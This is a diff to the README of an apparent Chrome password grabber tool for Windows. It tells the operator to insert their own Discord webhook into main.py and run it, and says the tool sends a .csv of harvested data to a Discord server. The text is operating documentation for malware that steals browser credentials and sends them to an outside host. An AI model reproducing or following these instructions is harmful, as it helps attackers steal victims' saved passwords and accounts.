ChineeseGuy/Chrome-password-grabber-with-discord-webhook-./README.md

 # OS support
 Windows

 # Usage
-replace your webhook here with your webhook in main.py python main.py
+replace your webhook here with your webhook in main.py and run it (make sure you have_ in your dictionary)

 # Output
 Sends a .cvs file to a discord server through a webhook